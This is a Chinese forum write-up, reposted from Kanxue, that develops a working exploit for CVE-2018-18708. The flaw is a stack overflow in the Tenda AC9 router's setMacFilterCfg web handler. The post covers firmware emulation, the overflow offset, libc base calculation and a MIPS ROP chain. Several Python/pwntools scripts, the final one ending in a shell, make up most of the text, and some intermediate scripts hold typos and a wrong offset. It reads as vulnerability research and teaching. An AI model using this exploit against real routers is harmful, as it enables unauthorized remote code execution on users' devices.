CVE-2018-18708 TENDA缓冲区溢出漏洞
data:image/s3,"s3://crabby-images/a3bd7/a3bd7545d8d518c7486017ee75b2fa80cbea4a1f" alt=""
本文为看雪论坛精华文章
看雪论坛作者ID:The_Itach1
一
漏洞简介
二
仿真模拟
binwalk -Me US_AC9V3.0RTL_V15.03.06.42_multi_TD01.bin
readelf -h ./bin/httpd
data:image/s3,"s3://crabby-images/0fdd4/0fdd46a8fd12bff682e3b69aefd5ae783b8e5986" alt=""
同样和之前的tenda路由器设备,都需要patch下,mips的调用函数有点不一样,常规来说是下面这种方式,先la将函数地址给v0,然后给t9,然后在跳转到函数。
la $v0, websGetVar
move $t9, $v0
jalr $t9 ; websGetVar
data:image/s3,"s3://crabby-images/7be05/7be05cee01762fb5199dd56c6ad9f8f46498afb1" alt=""
sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 ens33
sudo ifconfig br0 up
sudo dhclient br0
cp $(which qemu-mipsel-static) .
sudo chroot ./ ./qemu-mipsel-static ./bin/httpd
三
漏洞分析
data:image/s3,"s3://crabby-images/825fa/825fa5632073497d23a41e197e4a803c977145d6" alt=""
然后查看下返回的包。
data:image/s3,"s3://crabby-images/82636/82636d520f29355184a92aabdcc54ff88d537924" alt=""
返回了个{"errCode":2},我们到formSetMacFilterCfg函数内部,查看setMacFilterCfg接口对应的处理过程,需要注意的是这些地方。
Var = (const char *)websGetVar(a1, "macFilterType", &unk_52346C);
v2 = set_macfilter_mode(Var);
...
...
reload_macfilter_rules_to_wireless(Var);
data:image/s3,"s3://crabby-images/742dd/742ddd7a878d034d07573a7718f5969922957f30" alt=""
现在我们知道了为什么会返回{"errCode":2},所以现在的关键点就在于如何让set_macfilter_mode函数返回0,传给这个函数参数为websGetVar获取到macFilterType的具体值。
data:image/s3,"s3://crabby-images/cb647/cb64711cd6e8138c658b623c08536908a6be6b13" alt=""
所以必须post传参,"macFilterType": "black",或者white。
data:image/s3,"s3://crabby-images/643a4/643a487b39c0d475892a4f05409ca13b9eab9455" alt=""
进入set_macfilter_rules_by_one,实际上这个才是会发生溢出的函数,其v4变量会由于parse_macfilter_rule中的strcpy导致溢出而覆盖返回地址。
data:image/s3,"s3://crabby-images/e0880/e088007a59bd385b44d2b3ea5d52ff46fa1a4c3f" alt=""
进入parse_macfilter_rule函数,分析得知,deviceList第一个字节必须是'\r'。
data:image/s3,"s3://crabby-images/e9ebb/e9ebb3781f52f2ec695bd3612afd2b017527ad6c" alt=""
data:image/s3,"s3://crabby-images/b46fb/b46fb387db8e9c59643e75d22514ab09e1f65bee" alt=""
然后计算一下,偏移大概就是在472或者476的样子,我们编写exp进行测试。
import requests
from pwn import *
url = "http://192.168.112.131/goform/setMacFilterCfg"
cookie = {"Cookie":"password=1111"}
data = {"macFilterType": "black", "deviceList":"\r" + "A" * 472 + "bbbb"}
requests.post(url, cookies=cookie, data=data)
data:image/s3,"s3://crabby-images/3df9a/3df9a27cc01cb1ad5ee71da7e1b1087a6918cf11" alt=""
可以看到刚刚好。
四
漏洞利用
寻找libc基址
data:image/s3,"s3://crabby-images/66c30/66c30cfdbead412e088503f37d0ec8f6fb585e91" alt=""
然后用ida载入libc.so.0,去exports查看对应的函数地址,发现在0x0005F804,当然也可以用readelf -s ./lib/libc.so.0 | grep uClibc_main。
import requests
from pwn import *
url = "http://192.168.112.131/goform/setMacFilterCfg"
cookie = {"Cookie":"password=1111"}
libc_base=0x7f583a08-0x0005F804
system=0x0060320
system_addr=libc_base+system
data = {"macFilterType": "black", "deviceList":b"\r" + b"A" * 472 + p32(system_addr)}
requests.post(url, cookies=cookie, data=data)
data:image/s3,"s3://crabby-images/fa5fe/fa5fe160739ed4107eb22b82dbbcd1eac82ef7d3" alt=""
可以看到运气较好的是,我们仍然在libc中,但是不知道具体位置,这时候我们可以用ida的字符串搜索功能,去尝试搜索到对应的位置。
data:image/s3,"s3://crabby-images/3f529/3f529b467491afbc662ce93a6743cc9ff68e793a" alt=""
成功找到对应偏移位置,0x0006054C,由于关了aslr,所以基址不变,得到libc_base=0x7f58454c - 0x0006054C = 0x7F524000
import requests
from pwn import *
url = "http://192.168.112.131/goform/setMacFilterCfg"
cookie = {"Cookie":"password=1111"}
libc_base=0x7f58454c - 0x0006054
system=0x0060320
system_addr=libc_base+system
data = {"macFilterType": "black", "deviceList":b"\r" + b"A" * 472 + p32(system_addr)}
requests.post(url, cookies=cookie, data=data)
data:image/s3,"s3://crabby-images/822fc/822fc74de633c50944330299d13866bee40f0c48" alt=""
构造rop链
import mipsrop
mipsrop = mipsrop.MIPSROPFinder()
data:image/s3,"s3://crabby-images/8facf/8facff89616f122b1eeaa4ca105ec9e976ac29a5" alt=""
.text:0000DC1C move $a0, $s0
.text:0000DC20 move $t9, $s1
.text:0000DC24 jalr $t9 ; stat64
data:image/s3,"s3://crabby-images/fa5fe/fa5fe160739ed4107eb22b82dbbcd1eac82ef7d3" alt=""
.text:00060530 lw $ra, 0x18+var_s14($sp)
.text:00060534
.text:00060534 loc_60534: # CODE XREF: sub_603D8+138↑j
.text:00060534 lw $s4, 0x18+var_s10($sp)
.text:00060538 lw $s3, 0x18+var_sC($sp)
.text:0006053C lw $s2, 0x18+var_s8($sp)
.text:00060540 lw $s1, 0x18+var_s4($sp)
.text:00060544 lw $s0, 0x18+var_s0($sp)
.text:00060548 jr $ra
.text:0006054C addiu $sp, 0x30
b"\r" + b"A" * 472 + p32(gadget1)+b"A"*24+p32(binsh_addr)+p32(system_addr)+b"A"*12+p32(gadget2)
data:image/s3,"s3://crabby-images/f3103/f3103bdc941b21a4ab463c1fabeef3c500a03b5d" alt=""
这里爆了个访问错误,$v0应该是个地址,但是变成了我们的0x41414141。
snprintf(v5, 0x80u, "macfilter.%s.list%d", a1, a3);
import requests
from pwn import *
url = "http://192.168.112.131/goform/setMacFilterCfg"
cookie = {"Cookie":"password=1111"}
#libc_base=0x7f583a08-0x0005F804
libc_base=0x7f58452c-0x0006052C
lib=0x7F524000
system=0x0060320
binsh=0x0006AE30
gadget1=libc_base+0x00060530
gadget2=libc_base+0x0000DC1C
system_addr=libc_base+system
binsh_addr=libc_base+binsh
data = {"macFilterType": "black", "deviceList":b"\r" + b"A" * 472 + p32(gadget1)b"bbbb"+b"A"*20+p32(binsh_addr)+p32(system_addr)+b"A"*12+p32(gadget2)}
requests.post(url, cookies=cookie, data=data)
data:image/s3,"s3://crabby-images/e1f4c/e1f4c04154c383c568104428adc98d1d5c54637a" alt=""
而恰好,set_macfilter_rules_by_one在执行完parse_macfilter_rule函数,发生了溢出后,后面的snprintf函数调用了a1,也就是第一个参数,且a1是一个地址,但是按照我们playload覆盖后a1将变为一个值,所以会照成访问异常。
data:image/s3,"s3://crabby-images/e0b22/e0b22b9ef332c54dba3c2eded5425c920a65fb5c" alt=""
最终exp以及调试
import requests
from pwn import *
url = "http://192.168.112.131/goform/setMacFilterCfg"
cookie = {"Cookie":"password=1111"}
#libc_base=0x7f583a08-0x0005F804
libc_base=0x7f58452c-0x0006052C
lib=0x7F524000
system=0x0060320
binsh=0x0006AE30
gadget1=libc_base+0x00060530
gadget2=libc_base+0x0000DC1C
system_addr=libc_base+system
binsh_addr=libc_base+binsh
data = {"macFilterType": "black", "deviceList":b"\r" + b"A" * 472 + p32(gadget1)+p32(0x7FFFF090)+b"A"*20+p32(binsh_addr)+p32(system_addr)+b"A"*12+p32(gadget2)}
requests.post(url, cookies=cookie, data=data)
data:image/s3,"s3://crabby-images/4d44d/4d44d71b9acdc58507843278320dd3a153d2df63" alt=""
gadget2
data:image/s3,"s3://crabby-images/a694f/a694f00740676a376909c0110d8b6ac2562ce298" alt=""
getshell
data:image/s3,"s3://crabby-images/17743/17743e51ee00bc01c3f17ff78aa340362c2f51d6" alt=""
五
总结
参考
看雪ID:The_Itach1
https://bbs.pediy.com/user-home-926755.htm
# 往期推荐
data:image/s3,"s3://crabby-images/6f932/6f932423cd10ee717dd377c9c9ab8550a0fcd585" alt=""
data:image/s3,"s3://crabby-images/3f1e7/3f1e7ad1d0e0066e37c3e80bad0e50d3f60b82e8" alt=""
球分享
data:image/s3,"s3://crabby-images/3f1e7/3f1e7ad1d0e0066e37c3e80bad0e50d3f60b82e8" alt=""
球点赞
data:image/s3,"s3://crabby-images/3f1e7/3f1e7ad1d0e0066e37c3e80bad0e50d3f60b82e8" alt=""
球在看
data:image/s3,"s3://crabby-images/8998a/8998a332d925bb87e0de4d56781f543d9a0e8602" alt=""
点击“阅读原文”,了解更多!
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
data:image/s3,"s3://crabby-images/1019d/1019d51d7b80866d93c96b9071fd9c90b5d6fb8a" alt="公众号"
随时掌握互联网精彩
- 顶级WordPress缓存插件W3 Total Cache存在高危漏洞 请立即升级
- 小皮面板,永久免费的国内老牌的Linux服务器管理面板
- Go 闯进 Top 10、C++ 再次被 Java 反超,TIOBE 3 月榜单发布
- Python 初版发布 | 历史上的今天
- 物联网,云计算,人工智能,科技握手环境,共建美好家园
- 发布 | 安在新榜 · 2022中国网络安全产品用户调查报告
- 高研班直播公开课《算法特征与C魔改还原》
- Android Linker详解
- 实战度量风险,让企业安全价值看得见
- 诸子笔会 | 肖文棣:安全自动化之思考
- 什么是DV SSL证书
- 骁龙888移动平台,重新定义顶级移动体验
赞助链接